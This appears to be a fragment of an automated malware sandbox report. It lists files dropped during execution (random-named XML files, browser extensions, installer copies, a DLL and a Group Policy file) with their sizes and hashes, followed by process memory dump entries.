                                                                                                        • C:\Program Files (x86)\oAFUAAtjhSnSXhroJAR\gocNDzi.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          2f5621d78a66011418e13d728f37ee4f

                                                                                                          SHA1

                                                                                                          d20f0b31cabfe8feac13a522f558dce3ab21033f

                                                                                                          SHA256

                                                                                                          8cc43707d23d3773cac2f8124732316562b9ffbaf594ae348d0ccc3457eddfe9

                                                                                                          SHA512

                                                                                                          9ae62e90aed53dd5151af502f5c835162f71e0b439169fb8f51fa6851ce12db4f9003c3f8e5b76481b1ff2fa10eb837de40bf7b589f4087c3f35a7a686d3dfde

                                                                                                        • C:\Program Files (x86)\vLeBJzRGMQgkC\EdEgVPx.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          d4e04fdf5c60901658612f459cb1f0c9

                                                                                                          SHA1

                                                                                                          e80708a5cf4c7baaaa73768721fcb6044216aaf9

                                                                                                          SHA256

                                                                                                          4b3a74046f9d5874219b746247b98dca45645bde8e9008f591f620f71b260589

                                                                                                          SHA512

                                                                                                          67eef4697da968aeca4b2dcdd077fc2b1d41da52350f549991c383fa668d758cdce6ca6ec6f851867e714407fde0ffea076fba0822f0d895fdd54c30b30a8228

                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                          MD5

                                                                                                          a5bce6fbf5742aa5349ea129c8950f9f

                                                                                                          SHA1

                                                                                                          8d53b5f24be00ad39659a5f6c4acf1cc968936a4

                                                                                                          SHA256

                                                                                                          7d4bfbd7b0d9484bcbdb0cce8cf32b25425a280cf471897e9d6dfeed31162ade

                                                                                                          SHA512

                                                                                                          6891585b5b58dcb661bd4934780634257036faae2fb3dad272434c5524f39ff91cb4c53e8b3ee2d4a2439dad83b99ec80145b01051797fc2ead2d4ddda681c7d

                                                                                                        • C:\ProgramData\ZiQWrnyFBZbLdLVB\HBoMMUY.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          dd9e9cf03b74e7d7c95738f0e80b773c

                                                                                                          SHA1

                                                                                                          22f57dd27646b1ea48c003c85e7dac71027bc368

                                                                                                          SHA256

                                                                                                          f7a7826ffbb2d6128e9309f2ed3b9ad7849a61e9f775a44208e18b806b92403b

                                                                                                          SHA512

                                                                                                          55a964f7c474199a41cc7ecfb24350c7c287f93b617319e2a5645bea4d720dcd016b63f1b7769a3ccb0cf44959eaddec04eb7f6c52b481d88e9051dcd10e9c28

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                          Filesize

                                                                                                          187B

                                                                                                          MD5

                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                          SHA1

                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                          SHA256

                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                          SHA512

                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                          Filesize

                                                                                                          136B

                                                                                                          MD5

                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                          SHA1

                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                          SHA256

                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                          SHA512

                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                          Filesize

                                                                                                          150B

                                                                                                          MD5

                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                          SHA1

                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                          SHA256

                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                          SHA512

                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                          Filesize

                                                                                                          10KB

                                                                                                          MD5

                                                                                                          5a052fd054a8de27e0e9edfca3f0e7fa

                                                                                                          SHA1

                                                                                                          fb524f6b064f6ee786249c87e3cc64e8865ba920

                                                                                                          SHA256

                                                                                                          1260993e1443f2d3d5cadd870de5b9d9ac2a7ee707eba8a9b842c739bd5c36f1

                                                                                                          SHA512

                                                                                                          4c257538ee5214da09f9c4f9e34b5989377487415e621c4916903cf53ed5f833989b169c09129ab2a056d3004c577693ebb2ad3fadec11a2611619f6f7d99f5b

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          6bf0e5945fb9da68e1b03bdaed5f6f8d

                                                                                                          SHA1

                                                                                                          eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

                                                                                                          SHA256

                                                                                                          dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

                                                                                                          SHA512

                                                                                                          977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          4d27e0bc6561fa966f53e78c45343f41

                                                                                                          SHA1

                                                                                                          ce0ea826a0d7b6e5d04a6a9b0f84875a45f8ca3f

                                                                                                          SHA256

                                                                                                          315a740f83487c652b47297496370aa5bd2c8338728a247ff3ee32abdb467061

                                                                                                          SHA512

                                                                                                          a35fdaa9038dc5d5085e2c4f9f0a068a4bdca95f3b8095428aced775ea8791f12e01670ab6b5f5f9fbd8654684a322b87444b6c0b1c298b4342ff479f128e86f

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          a7449e70e7285516a066cd0a48d5c2c1

                                                                                                          SHA1

                                                                                                          1254086887016ae63a16c2d978c2fafc92a59bc0

                                                                                                          SHA256

                                                                                                          6654ba93d830904a879941781a6c3fc3b0b6191ada75a7cfc8e267f42ab42349

                                                                                                          SHA512

                                                                                                          d2d13d7a329e73868490ccb86c9ab910f1c9867d087b59fdbdf9929822fea2fbc03d41a064606ca49c37ffac6aea3005df98b141fabbb24d13999aee90b5ce5b

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS632E.tmp\Install.exe

                                                                                                          Filesize

                                                                                                          6.4MB

                                                                                                          MD5

                                                                                                          7f432059dfdf92e23012955b1a459d11

                                                                                                          SHA1

                                                                                                          8d7b88aa2afd2e7fcc1730e61b4ca0965be22524

                                                                                                          SHA256

                                                                                                          a4e06bf4f3c904f2c7596353cf0aee6233cabff6f36d1430ef74869d56a3af31

                                                                                                          SHA512

                                                                                                          f85c91cadd8c9226cba1a7161c2b6bf8ac5f8014f9abf400399845b1fda7d925c0e90ed5768f9f55d4edcde20e206e3d3c5dd5dd7b3a5079cf6db2558c94348a

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS6513.tmp\Install.exe

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                          MD5

                                                                                                          1f5dab09f8df66fd6df158f75281c75a

                                                                                                          SHA1

                                                                                                          4cb1f5ecfd661ef6a59e3bae824d5c645c0383ce

                                                                                                          SHA256

                                                                                                          21ba019a32fb0bbdf23a489076f31f6678a797b777951b2030fd6276bbdfc32d

                                                                                                          SHA512

                                                                                                          7182270f0f7333cc7b4c5927f714dcdac6a6acc2f653b0529af493e47169ddadea5942ae4fc61efe0eacce7b0abffb0f400816753c233a8aef73a0a5182dd0d6

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qc32wp2g.gnq.ps1

                                                                                                          Filesize

                                                                                                          1B

                                                                                                          MD5

                                                                                                          c4ca4238a0b923820dcc509a6f75849b

                                                                                                          SHA1

                                                                                                          356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                          SHA256

                                                                                                          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                          SHA512

                                                                                                          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.js

                                                                                                          Filesize

                                                                                                          6KB

                                                                                                          MD5

                                                                                                          e42256304452766d29b46a8a116cba55

                                                                                                          SHA1

                                                                                                          598add66b9ed1e37c1548a20594807ae50adb025

                                                                                                          SHA256

                                                                                                          919b44d3d411a28d5456d2b4b84ba4c436b59bcb0ad37bf3e528b9126b61d976

                                                                                                          SHA512

                                                                                                          d2f6545a7026b7a5bc48aaaa848029c294b77a9434cd5e9d1b9843718a6659d672174433b676f3f20ca513efd404c0dffac02b94e1dd89b10c2229d0ae8d9906

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          c77470233b7405617458ec0c0e2c46cc

                                                                                                          SHA1

                                                                                                          5f43102285b2a7dfa4c906cc06b292b4e7e9617e

                                                                                                          SHA256

                                                                                                          4294a9ae3e8b81c2f9db4114cb1e118f9b2e14ec5a7ee1c3492851fa609b3825

                                                                                                          SHA512

                                                                                                          0a2be5a2a3bc862a25e0237a8b1aaefe1229cab72da607ee596c68c91562766d8251520f9adf14e057eef5071b1543afdbca2bcb37a98686dd65cb64b137133b

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          b6401d360467818bdf2b2d9933ed9328

                                                                                                          SHA1

                                                                                                          7289dde5ac1a6cb701837104d03ec0a1f038a558

                                                                                                          SHA256

                                                                                                          a9fed022d87bde4c5256eec539825208064d591f1af61310c0dfc2277f7adb03

                                                                                                          SHA512

                                                                                                          0184989be2e5eaa1679a4239b45409bb183e521940251c58e3132014350dac9157c437ab32bc4d8d5c405dfab8932f45b5c9a3b94883cca164c012821b2949a3

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          771d2f94a76f5705732e84c6dc545714

                                                                                                          SHA1

                                                                                                          df1e526f2ba21d49f2c393ef85fa79144f394d94

                                                                                                          SHA256

                                                                                                          13904bf692a69f2a0200a2bf05b44a2dcab013ed86e094dc1c0b2196c8a48244

                                                                                                          SHA512

                                                                                                          9af42421fe4351a53851ec226cd2ddf2b31932919c0e237cc3882197f6a615eee4085f421f239d4483de3026c4d7c1988a847ed26634d1bb84bbbe8b68bae6cb

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          6e0c74c7e11b814375f45bee33768dcd

                                                                                                          SHA1

                                                                                                          1ba8ca8faf165e0833207c23c5f85dc36daa5a18

                                                                                                          SHA256

                                                                                                          e209997ec3cfa1d8555a931f30bf5b454490858d218732d924f6c7dd5a4700fb

                                                                                                          SHA512

                                                                                                          397630a437f6f46df7286cb08e99c4908756798245d758ec64eae69aba459fceedc3be43c2f76b0516b3fa0fff8202d6814b9ed40ac6b6f37cc590bdbf38e7a5

                                                                                                        • C:\Windows\Temp\QlQFWsVyIPRhNWFc\HqNxqoUw\YTznMBX.dll

                                                                                                          Filesize

                                                                                                          6.4MB

                                                                                                          MD5

                                                                                                          b4e0a1f2669533a335f268327f4769cb

                                                                                                          SHA1

                                                                                                          6d5603bf5b4f339d40a7c89bc6a4404c6acb8170

                                                                                                          SHA256

                                                                                                          ef58c3bef1e882d93cc2ce8a9408f1c8f2fca35f5950623d9bac38a65d5c6ad3

                                                                                                          SHA512

                                                                                                          e1543717384bac10378cfc52963443dccb60e1b18d63c8f2abbf18c38226e969500e423f0b04c9609a35e589e45e5898d20a5dfbfb8eefca7578ef37ee824678

                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                          Filesize

                                                                                                          5KB

                                                                                                          MD5

                                                                                                          af74459f311b12bb32742568464d8eab

                                                                                                          SHA1

                                                                                                          0e7f11433b75e11593831956c8b89e7b4a72c96c

                                                                                                          SHA256

                                                                                                          66c55d34829b979ba9a06bc7fd5c6292fbebec03672595d818f6f051f2b77249

                                                                                                          SHA512

                                                                                                          0b5a6180ab8d88603afcdf8974ceaf39c002b4bf2319b9f1bee7d3098d9763d2d124b8c47f715211a7706b73d7c6ad77d347a977dbe0cc275e34cfda2c374a18

                                                                                                        • memory/828-229-0x0000000006E60000-0x0000000006EAB000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/828-219-0x0000000006280000-0x00000000065D0000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/1160-20-0x00000000076D0000-0x0000000007A20000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/1160-16-0x0000000006F20000-0x0000000007548000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.2MB

                                                                                                        • memory/1160-41-0x0000000009420000-0x000000000991E000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.0MB

                                                                                                        • memory/1160-15-0x0000000000DF0000-0x0000000000E26000-memory.dmp

                                                                                                          Filesize

                                                                                                          216KB

                                                                                                        • memory/1160-40-0x0000000008BD0000-0x0000000008BF2000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/1160-17-0x0000000006CD0000-0x0000000006CF2000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/1160-18-0x0000000006D70000-0x0000000006DD6000-memory.dmp

                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/1160-19-0x00000000075C0000-0x0000000007626000-memory.dmp

                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/1160-21-0x0000000007580000-0x000000000759C000-memory.dmp

                                                                                                          Filesize

                                                                                                          112KB

                                                                                                        • memory/1160-22-0x0000000007AE0000-0x0000000007B2B000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/1160-23-0x0000000007DC0000-0x0000000007E36000-memory.dmp

                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/1160-38-0x0000000008E80000-0x0000000008F14000-memory.dmp

                                                                                                          Filesize

                                                                                                          592KB

                                                                                                        • memory/1160-39-0x0000000008B60000-0x0000000008B7A000-memory.dmp

                                                                                                          Filesize

                                                                                                          104KB

                                                                                                        • memory/2112-56-0x00000000075A0000-0x00000000078F0000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/2112-58-0x0000000007AB0000-0x0000000007AFB000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/2272-167-0x0000000000DD0000-0x0000000001493000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.8MB

                                                                                                        • memory/2272-101-0x0000000010000000-0x0000000010C1E000-memory.dmp

                                                                                                          Filesize

                                                                                                          12.1MB

                                                                                                        • memory/2272-74-0x0000000000DD0000-0x0000000001493000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.8MB

                                                                                                        • memory/2316-474-0x0000000003FA0000-0x0000000004BBE000-memory.dmp

                                                                                                          Filesize

                                                                                                          12.1MB

                                                                                                        • memory/2448-78-0x0000000006C70000-0x0000000006CBB000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/2448-77-0x0000000006640000-0x0000000006990000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/3588-145-0x0000024BDF120000-0x0000024BDF196000-memory.dmp

                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/3588-141-0x0000024BDEE50000-0x0000024BDEE72000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4912-175-0x0000000000380000-0x0000000000A43000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.8MB

                                                                                                        • memory/4912-270-0x0000000003430000-0x0000000003492000-memory.dmp

                                                                                                          Filesize

                                                                                                          392KB

                                                                                                        • memory/4912-453-0x0000000003C10000-0x0000000003C93000-memory.dmp

                                                                                                          Filesize

                                                                                                          524KB

                                                                                                        • memory/4912-200-0x0000000010000000-0x0000000010C1E000-memory.dmp

                                                                                                          Filesize

                                                                                                          12.1MB

                                                                                                        • memory/4912-465-0x0000000003D80000-0x0000000003E55000-memory.dmp

                                                                                                          Filesize

                                                                                                          852KB

                                                                                                        • memory/4912-213-0x0000000002C70000-0x0000000002CF5000-memory.dmp

                                                                                                          Filesize

                                                                                                          532KB

                                                                                                        • memory/4912-487-0x0000000000380000-0x0000000000A43000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.8MB

                                                                                                        • memory/4920-72-0x0000000000DD0000-0x0000000001493000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.8MB

                                                                                                        • memory/4920-50-0x0000000010000000-0x0000000010C1E000-memory.dmp

                                                                                                          Filesize

                                                                                                          12.1MB

                                                                                                        • memory/4920-12-0x0000000000DD0000-0x0000000001493000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.8MB